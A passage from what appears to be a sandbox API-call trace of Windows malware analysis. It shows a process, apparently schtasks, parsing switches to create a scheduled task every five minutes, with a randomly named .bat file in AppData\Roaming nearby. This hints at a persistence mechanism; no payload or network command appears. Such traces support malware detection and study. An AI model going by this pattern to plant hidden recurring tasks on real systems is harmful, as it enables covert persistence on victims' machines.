wMatch=0x74) returned 0x0 [0288.393] GetLastError () returned 0x0 [0288.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0288.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0288.393] RtlRestoreLastWin32Error () returned 0x0 [0288.393] RtlRestoreLastWin32Error () returned 0x0 [0288.393] lstrlenW (lpString="/sc") returned 3 [0288.393] lstrlenW (lpString="-/") returned 2 [0288.393] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0288.393] lstrlenW (lpString="create") returned 6 [0288.393] lstrlenW (lpString="create") returned 6 [0288.393] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.393] lstrlenW (lpString="sc") returned 2 [0288.393] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.393] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|create|") returned 8 [0288.393] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.393] lstrlenW (lpString="|create|") returned 8 [0288.393] lstrlenW (lpString="|sc|") returned 4 [0288.393] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0288.393] RtlRestoreLastWin32Error () returned 0x490 [0288.393] lstrlenW (lpString="?") returned 1 [0288.393] lstrlenW (lpString="?") returned 1 [0288.393] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.393] lstrlenW (lpString="sc") returned 2 [0288.393] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.393] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|?|") returned 3 [0288.393] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.393] lstrlenW (lpString="|?|") returned 3 [0288.393] lstrlenW (lpString="|sc|") returned 4 [0288.393] RtlRestoreLastWin32Error () returned 0x490 [0288.393] lstrlenW (lpString="s") returned 1 [0288.393] lstrlenW (lpString="s") returned 1 [0288.393] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.393] lstrlenW (lpString="sc") returned 2 [0288.394] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|s|") returned 3 [0288.394] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.394] lstrlenW (lpString="|s|") returned 3 [0288.394] lstrlenW (lpString="|sc|") returned 4 [0288.394] RtlRestoreLastWin32Error () returned 0x490 [0288.394] lstrlenW (lpString="u") returned 1 [0288.394] lstrlenW (lpString="u") returned 1 [0288.394] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] lstrlenW (lpString="sc") returned 2 [0288.394] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|u|") returned 3 [0288.394] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.394] lstrlenW (lpString="|u|") returned 3 [0288.394] lstrlenW (lpString="|sc|") returned 4 [0288.394] RtlRestoreLastWin32Error () returned 0x490 [0288.394] lstrlenW (lpString="p") returned 1 [0288.394] lstrlenW (lpString="p") returned 1 [0288.394] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] lstrlenW (lpString="sc") returned 2 [0288.394] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|p|") returned 3 [0288.394] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.394] lstrlenW (lpString="|p|") returned 3 [0288.394] lstrlenW (lpString="|sc|") returned 4 [0288.394] RtlRestoreLastWin32Error () returned 0x490 [0288.394] lstrlenW (lpString="ru") returned 2 [0288.394] lstrlenW (lpString="ru") returned 2 [0288.394] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] lstrlenW (lpString="sc") returned 2 [0288.394] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ru|") returned 4 [0288.394] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.394] lstrlenW (lpString="|ru|") returned 4 [0288.394] lstrlenW (lpString="|sc|") returned 4 [0288.394] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0288.394] RtlRestoreLastWin32Error () returned 0x490 [0288.394] lstrlenW (lpString="rp") returned 2 [0288.394] lstrlenW (lpString="rp") returned 2 [0288.394] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] lstrlenW (lpString="sc") returned 2 [0288.394] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.394] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|rp|") returned 4 [0288.394] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.394] lstrlenW (lpString="|rp|") returned 4 [0288.394] lstrlenW (lpString="|sc|") returned 4 [0288.394] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0288.395] RtlRestoreLastWin32Error () returned 0x490 [0288.395] lstrlenW (lpString="sc") returned 2 [0288.395] lstrlenW (lpString="sc") returned 2 [0288.395] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.395] lstrlenW (lpString="sc") returned 2 [0288.395] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.395] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.395] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.395] lstrlenW (lpString="|sc|") returned 4 [0288.395] lstrlenW (lpString="|sc|") returned 4 [0288.395] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0288.395] RtlRestoreLastWin32Error () returned 0x0 [0288.395] RtlRestoreLastWin32Error () returned 0x0 [0288.395] lstrlenW (lpString="minute") returned 6 [0288.395] lstrlenW (lpString="-/") returned 2 [0288.395] StrChrIW (lpStart="-/", wMatch=0x52b006d) returned 0x0 [0288.395] RtlRestoreLastWin32Error () returned 0x490 [0288.395] RtlRestoreLastWin32Error () returned 0x490 [0288.395] RtlRestoreLastWin32Error () returned 0x0 [0288.395] lstrlenW (lpString="minute") returned 6 [0288.395] StrChrIW (lpStart="minute", wMatch=0x3a) returned 0x0 [0288.395] RtlRestoreLastWin32Error () returned 0x490 [0288.395] RtlRestoreLastWin32Error () returned 0x0 [0288.395] _memicmp (_Buf1=0xde7620, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.395] lstrlenW (lpString="minute") returned 6 [0288.395] lstrlenW (lpString="minute") returned 6 [0288.395] lstrlenW (lpString=" \x09") returned 2 [0288.395] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0288.395] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0288.395] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0288.395] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0288.395] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0288.395] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0288.395] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0288.395] GetLastError () returned 0x0 [0288.395] lstrlenW (lpString="minute") returned 6 [0288.395] lstrlenW (lpString="minute") returned 6 [0288.395] RtlRestoreLastWin32Error () returned 0x0 [0288.395] RtlRestoreLastWin32Error () returned 0x0 [0288.395] lstrlenW (lpString="/mo") returned 3 [0288.395] lstrlenW (lpString="-/") returned 2 [0288.395] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0288.395] lstrlenW (lpString="create") returned 6 [0288.395] lstrlenW (lpString="create") returned 6 [0288.395] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.395] lstrlenW (lpString="mo") returned 2 [0288.395] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.395] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|create|") returned 8 [0288.395] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.395] lstrlenW (lpString="|create|") returned 8 [0288.395] lstrlenW (lpString="|mo|") returned 4 [0288.395] StrStrIW (lpFirst="|create|", lpSrch="|mo|") returned 0x0 [0288.396] RtlRestoreLastWin32Error () returned 0x490 [0288.396] lstrlenW (lpString="?") returned 1 [0288.396] lstrlenW (lpString="?") returned 1 [0288.396] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] lstrlenW (lpString="mo") returned 2 [0288.396] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|?|") returned 3 [0288.396] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.396] lstrlenW (lpString="|?|") returned 3 [0288.396] lstrlenW (lpString="|mo|") returned 4 [0288.396] RtlRestoreLastWin32Error () returned 0x490 [0288.396] lstrlenW (lpString="s") returned 1 [0288.396] lstrlenW (lpString="s") returned 1 [0288.396] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] lstrlenW (lpString="mo") returned 2 [0288.396] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|s|") returned 3 [0288.396] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.396] lstrlenW (lpString="|s|") returned 3 [0288.396] lstrlenW (lpString="|mo|") returned 4 [0288.396] RtlRestoreLastWin32Error () returned 0x490 [0288.396] lstrlenW (lpString="u") returned 1 [0288.396] lstrlenW (lpString="u") returned 1 [0288.396] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] lstrlenW (lpString="mo") returned 2 [0288.396] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|u|") returned 3 [0288.396] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.396] lstrlenW (lpString="|u|") returned 3 [0288.396] lstrlenW (lpString="|mo|") returned 4 [0288.396] RtlRestoreLastWin32Error () returned 0x490 [0288.396] lstrlenW (lpString="p") returned 1 [0288.396] lstrlenW (lpString="p") returned 1 [0288.396] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] lstrlenW (lpString="mo") returned 2 [0288.396] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|p|") returned 3 [0288.396] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.396] lstrlenW (lpString="|p|") returned 3 [0288.396] lstrlenW (lpString="|mo|") returned 4 [0288.396] RtlRestoreLastWin32Error () returned 0x490 [0288.396] lstrlenW (lpString="ru") returned 2 [0288.396] lstrlenW (lpString="ru") returned 2 [0288.396] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] lstrlenW (lpString="mo") returned 2 [0288.396] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.396] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ru|") returned 4 [0288.396] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.397] lstrlenW (lpString="|ru|") returned 4 [0288.397] lstrlenW (lpString="|mo|") returned 4 [0288.397] StrStrIW (lpFirst="|ru|", lpSrch="|mo|") returned 0x0 [0288.397] RtlRestoreLastWin32Error () returned 0x490 [0288.397] lstrlenW (lpString="rp") returned 2 [0288.397] lstrlenW (lpString="rp") returned 2 [0288.397] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.397] lstrlenW (lpString="mo") returned 2 [0288.397] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.397] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|rp|") returned 4 [0288.397] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.397] lstrlenW (lpString="|rp|") returned 4 [0288.397] lstrlenW (lpString="|mo|") returned 4 [0288.397] StrStrIW (lpFirst="|rp|", lpSrch="|mo|") returned 0x0 [0288.397] RtlRestoreLastWin32Error () returned 0x490 [0288.397] lstrlenW (lpString="sc") returned 2 [0288.397] lstrlenW (lpString="sc") returned 2 [0288.397] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.397] lstrlenW (lpString="mo") returned 2 [0288.397] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.397] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.397] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.397] lstrlenW (lpString="|sc|") returned 4 [0288.397] lstrlenW (lpString="|mo|") returned 4 [0288.397] StrStrIW (lpFirst="|sc|", lpSrch="|mo|") returned 0x0 [0288.397] RtlRestoreLastWin32Error () returned 0x490 [0288.397] lstrlenW (lpString="mo") returned 2 [0288.397] lstrlenW (lpString="mo") returned 2 [0288.397] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.397] lstrlenW (lpString="mo") returned 2 [0288.397] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.397] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.397] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.397] lstrlenW (lpString="|mo|") returned 4 [0288.397] lstrlenW (lpString="|mo|") returned 4 [0288.397] StrStrIW (lpFirst="|mo|", lpSrch="|mo|") returned="|mo|" [0288.397] RtlRestoreLastWin32Error () returned 0x0 [0288.397] RtlRestoreLastWin32Error () returned 0x0 [0288.397] lstrlenW (lpString="5") returned 1 [0288.397] RtlRestoreLastWin32Error () returned 0x490 [0288.397] RtlRestoreLastWin32Error () returned 0x0 [0288.397] lstrlenW (lpString="5") returned 1 [0288.397] StrChrIW (lpStart="5", wMatch=0x3a) returned 0x0 [0288.397] RtlRestoreLastWin32Error () returned 0x490 [0288.397] RtlRestoreLastWin32Error () returned 0x0 [0288.397] _memicmp (_Buf1=0xde7620, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.397] lstrlenW (lpString="5") returned 1 [0288.397] lstrlenW (lpString="5") returned 1 [0288.397] lstrlenW (lpString=" \x09") returned 2 [0288.397] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0288.397] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0288.398] GetLastError () returned 0x0 [0288.398] lstrlenW (lpString="5") returned 1 [0288.398] lstrlenW (lpString="5") returned 1 [0288.398] RtlRestoreLastWin32Error () returned 0x0 [0288.398] RtlRestoreLastWin32Error () returned 0x0 [0288.398] lstrlenW (lpString="/RL") returned 3 [0288.398] lstrlenW (lpString="-/") returned 2 [0288.398] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0288.398] lstrlenW (lpString="create") returned 6 [0288.398] lstrlenW (lpString="create") returned 6 [0288.398] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.398] lstrlenW (lpString="RL") returned 2 [0288.398] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.398] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|create|") returned 8 [0288.398] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.398] lstrlenW (lpString="|create|") returned 8 [0288.398] lstrlenW (lpString="|RL|") returned 4 [0288.398] StrStrIW (lpFirst="|create|", lpSrch="|RL|") returned 0x0 [0288.398] RtlRestoreLastWin32Error () returned 0x490 [0288.398] lstrlenW (lpString="?") returned 1 [0288.398] lstrlenW (lpString="?") returned 1 [0288.398] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.398] lstrlenW (lpString="RL") returned 2 [0288.398] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.398] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|?|") returned 3 [0288.398] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.398] lstrlenW (lpString="|?|") returned 3 [0288.398] lstrlenW (lpString="|RL|") returned 4 [0288.398] RtlRestoreLastWin32Error () returned 0x490 [0288.398] lstrlenW (lpString="s") returned 1 [0288.398] lstrlenW (lpString="s") returned 1 [0288.398] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.398] lstrlenW (lpString="RL") returned 2 [0288.398] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.398] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|s|") returned 3 [0288.398] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.398] lstrlenW (lpString="|s|") returned 3 [0288.398] lstrlenW (lpString="|RL|") returned 4 [0288.398] RtlRestoreLastWin32Error () returned 0x490 [0288.398] lstrlenW (lpString="u") returned 1 [0288.398] lstrlenW (lpString="u") returned 1 [0288.398] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.398] lstrlenW (lpString="RL") returned 2 [0288.398] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.398] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|u|") returned 3 [0288.399] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.399] lstrlenW (lpString="|u|") returned 3 [0288.399] lstrlenW (lpString="|RL|") returned 4 [0288.399] RtlRestoreLastWin32Error () returned 0x490 [0288.399] lstrlenW (lpString="p") returned 1 [0288.399] lstrlenW (lpString="p") returned 1 [0288.399] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.399] lstrlenW (lpString="RL") returned 2 [0288.399] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.399] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|p|") returned 3 [0288.399] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.399] lstrlenW (lpString="|p|") returned 3 [0288.399] lstrlenW (lpString="|RL|") returned 4 [0288.399] RtlRestoreLastWin32Error () returned 0x490 [0288.399] lstrlenW (lpString="ru") returned 2 [0288.399] lstrlenW (lpString="ru") returned 2 [0288.399] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.399] lstrlenW (lpString="RL") returned 2 [0288.399] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.399] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ru|") returned 4 [0288.399] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.399] lstrlenW (lpString="|ru|") returned 4 [0288.399] lstrlenW (lpString="|RL|") returned 4 [0288.399] StrStrIW (lpFirst="|ru|", lpSrch="|RL|") returned 0x0 [0288.399] RtlRestoreLastWin32Error () returned 0x490 [0288.399] lstrlenW (lpString="rp") returned 2 [0288.399] lstrlenW (lpString="rp") returned 2 [0288.399] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.399] lstrlenW (lpString="RL") returned 2 [0288.399] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.399] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|rp|") returned 4 [0288.399] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.399] lstrlenW (lpString="|rp|") returned 4 [0288.399] lstrlenW (lpString="|RL|") returned 4 [0288.399] StrStrIW (lpFirst="|rp|", lpSrch="|RL|") returned 0x0 [0288.399] RtlRestoreLastWin32Error () returned 0x490 [0288.399] lstrlenW (lpString="sc") returned 2 [0288.399] lstrlenW (lpString="sc") returned 2 [0288.399] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.399] lstrlenW (lpString="RL") returned 2 [0288.399] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.399] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.399] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.399] lstrlenW (lpString="|sc|") returned 4 [0288.399] lstrlenW (lpString="|RL|") returned 4 [0288.399] StrStrIW (lpFirst="|sc|", lpSrch="|RL|") returned 0x0 [0288.399] RtlRestoreLastWin32Error () returned 0x490 [0288.400] lstrlenW (lpString="mo") returned 2 [0288.400] lstrlenW (lpString="mo") returned 2 [0288.400] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] lstrlenW (lpString="RL") returned 2 [0288.400] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.400] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.400] lstrlenW (lpString="|mo|") returned 4 [0288.400] lstrlenW (lpString="|RL|") returned 4 [0288.400] StrStrIW (lpFirst="|mo|", lpSrch="|RL|") returned 0x0 [0288.400] RtlRestoreLastWin32Error () returned 0x490 [0288.400] lstrlenW (lpString="d") returned 1 [0288.400] lstrlenW (lpString="d") returned 1 [0288.400] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|d|") returned 3 [0288.400] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.400] lstrlenW (lpString="|d|") returned 3 [0288.400] lstrlenW (lpString="|RL|") returned 4 [0288.400] RtlRestoreLastWin32Error () returned 0x490 [0288.400] lstrlenW (lpString="m") returned 1 [0288.400] lstrlenW (lpString="m") returned 1 [0288.400] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|m|") returned 3 [0288.400] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.400] lstrlenW (lpString="|m|") returned 3 [0288.400] lstrlenW (lpString="|RL|") returned 4 [0288.400] RtlRestoreLastWin32Error () returned 0x490 [0288.400] lstrlenW (lpString="i") returned 1 [0288.400] lstrlenW (lpString="i") returned 1 [0288.400] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|i|") returned 3 [0288.400] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.400] lstrlenW (lpString="|i|") returned 3 [0288.400] lstrlenW (lpString="|RL|") returned 4 [0288.400] RtlRestoreLastWin32Error () returned 0x490 [0288.400] lstrlenW (lpString="tn") returned 2 [0288.400] lstrlenW (lpString="tn") returned 2 [0288.400] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.400] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.400] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|RL|") returned 4 [0288.400] lstrlenW (lpString="|tn|") returned 4 [0288.400] lstrlenW (lpString="|RL|") returned 4 [0288.400] StrStrIW (lpFirst="|tn|", lpSrch="|RL|") returned 0x0 [0288.401] RtlRestoreLastWin32Error () returned 0x490 [0288.401] lstrlenW (lpString="tr") returned 2 [0288.401] lstrlenW (lpString="tr") returned 2 [0288.401] 